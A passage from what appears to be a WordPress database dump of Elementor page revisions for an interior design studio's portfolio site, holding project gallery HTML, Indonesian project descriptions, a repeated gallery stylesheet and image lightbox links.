e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-09-22 08:36:54','2023-09-22 08:36:54','',4681,'https://bauhaus.futuremediatrix.com/?p=4852',0,'revision','',0),(4853,3,'2023-09-22 08:36:54','2023-09-22 08:36:54','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-09-22 08:36:54','2023-09-22 08:36:54','',4681,'https://bauhaus.futuremediatrix.com/?p=4853',0,'revision','',0),(4854,3,'2023-09-22 08:36:54','2023-09-22 08:36:54','<h3>our recent work</h3>\n														<h2>\n								Commercial Project							</h2>\n							<p> Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-09-22 08:36:54','2023-09-22 08:36:54','',4681,'https://bauhaus.futuremediatrix.com/?p=4854',0,'revision','',0),(4855,3,'2023-09-22 08:37:59','2023-09-22 08:37:59','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n							<p> Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) 